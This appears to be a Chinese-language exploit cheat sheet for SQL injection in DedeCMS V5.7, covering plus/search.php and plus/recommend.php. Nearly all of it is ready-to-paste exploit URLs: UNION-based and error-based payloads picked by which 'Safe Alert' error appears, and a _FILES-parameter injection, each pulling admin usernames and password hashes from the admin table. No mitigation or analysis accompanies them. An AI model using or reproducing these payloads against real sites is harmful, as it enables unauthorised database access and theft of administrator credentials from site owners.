跳转至

dedecms

V5.7

plus/search.php 注入

0×1:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为:Safe Alert: Request Error step 2 !

则利用以下exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111=@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`#@__admin`#@`\'`+]=a

0×2:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为:Safe Alert: Request Error step 1 !

则利用以下exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111=@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`#@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)#@`\'`+]=a

plus/recommend.php 注入

http://www.nxadmin.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294